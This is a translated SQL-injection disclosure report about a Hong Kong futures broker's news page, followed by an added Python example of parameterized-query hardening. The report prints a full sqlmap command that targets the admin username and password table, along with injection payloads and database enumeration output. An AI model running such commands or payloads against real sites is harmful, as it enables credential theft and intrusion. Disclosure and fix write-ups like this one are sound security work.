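2015-11-03: Details reported to the vendor; awaiting vendor handling
2015-11-04: Vendor confirmed; details disclosed to the vendor only
2015-11-14: Details disclosed to core white hats and experts in the relevant fields
2015-11-24: Details disclosed to regular white hats
2015-12-04: Details disclosed to intern white hats
2015-12-19: Details disclosed to the public
Zhida International Futures Co., Ltd. (直达国际期货有限公司) was founded in April 2011 and is headquartered in Hong Kong. Officially approved by the Hong Kong Securities and Futures Commission, it operates, in accordance with the relevant laws and regulations, a brokerage business in futures, options and other derivatives on exchanges in Hong Kong and on major overseas exchanges. Its central entity (CE) number is AXH777. Shanghai Zhida Software (上海直达软件公司) is a sister company with nearly 20 professional software engineers; it has built a dedicated-line network covering mainland China, Korea, Hong Kong and the United States, and provides a global trading platform, a settlement system, a risk management platform, programmatic trading and other products, giving the company's clients a stable, fast trading system. In 2014, a direct dedicated line to Chicago and a Chicago COLO hosting platform were set up, creating a high-speed, low-latency trading environment for the company's high-frequency trading clients and greatly improving the ability of onshore/offshore arbitrage funds and large institutional clients to seize market opportunities and compete for a millisecond lead. Since its founding, the company has listened to and met client needs, built long-term partnerships with clients, quickly won their recognition and rapidly grown its trading volume; it now ranks among the leading Chinese-funded futures companies in Hong Kong and has firmly established itself as a rising leader in the overseas futures industry.
Address: http://**.**.**.**/about/showNews.html?newsid=121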
python sqlmap.py -u "http://**.**.**.**/about/showNews.html?newsid=121" -p newsid --technique=BTU --random-agent --batch -D directaccess_db -T manage_admin -C id,username,userpassword --dump
---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=121 AND 3774=3774

    Type: UNION query
    Title: MySQL UNION query (28) - 9 columns
    Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'directaccess_ad@%'
current user is DBA: False

database management system users [1]:
[*] 'directaccess_ad'@'%'

available databases [2]:
[*] directaccess_db
[*] information_schema

Database: directaccess_db
[81 tables]

Database: directaccess_db
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| content      | mediumtext   |
| id           | int(11)      |
| username     | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+

Database: directaccess_db
Table: manage_admin
[11 entries]
Deploy a WAF.
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-11-04 18:42
The incident has been reported to the relevant organization.
None yet
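
The newsid injection reported above is closed at the source by validating the parameter as an integer and binding it to the query; a WAF only filters requests in front of the still-injectable statement. The following is an added example, not code from the report or from the vendor's application: SQLite stands in for MySQL, and the manage_news columns, the sample row and the function names are assumptions.

```python
import sqlite3

# Constructed stand-in data: SQLite replaces the MySQL back end, and the
# manage_news column names are assumptions (the report does not show them).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE manage_news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO manage_news VALUES (121, 'Notice', 'Trading hours update')")
    return db

def show_news_vulnerable(db, newsid):
    # 'Before' pattern: the raw query-string value is concatenated into SQL,
    # so anything after the number is parsed as SQL syntax.
    sql = "SELECT id, title, body FROM manage_news WHERE id = " + newsid
    return db.execute(sql).fetchall()

def show_news_hardened(db, newsid):
    # 1) Allow-list: newsid must be a short run of ASCII digits.
    if not (newsid.isascii() and newsid.isdigit() and len(newsid) <= 10):
        raise ValueError("newsid must be a positive integer")
    # 2) Bind the value as a parameter; it is never parsed as SQL.
    sql = "SELECT id, title, body FROM manage_news WHERE id = ?"
    return db.execute(sql, (int(newsid),)).fetchall()

def is_rejected(db, newsid):
    # True when the hardened handler refuses the value outright.
    try:
        show_news_hardened(db, newsid)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    db = make_db()
    # Values in the shape sqlmap reported for this endpoint
    # (UNION column count reduced to 3 to match the constructed table).
    probes = ["121", "121 AND 3774=3774", "121 AND 3774=3775",
              "-1875 UNION ALL SELECT 28,28,28"]
    for p in probes:
        print(repr(p), "vulnerable ->", show_news_vulnerable(db, p),
              "| hardened rejects:", is_rejected(db, p))
```

The vulnerable handler answers differently for the true and false conditions and returns the injected row for the UNION value, which is exactly the behaviour sqlmap detected; the hardened handler rejects all three before any SQL runs.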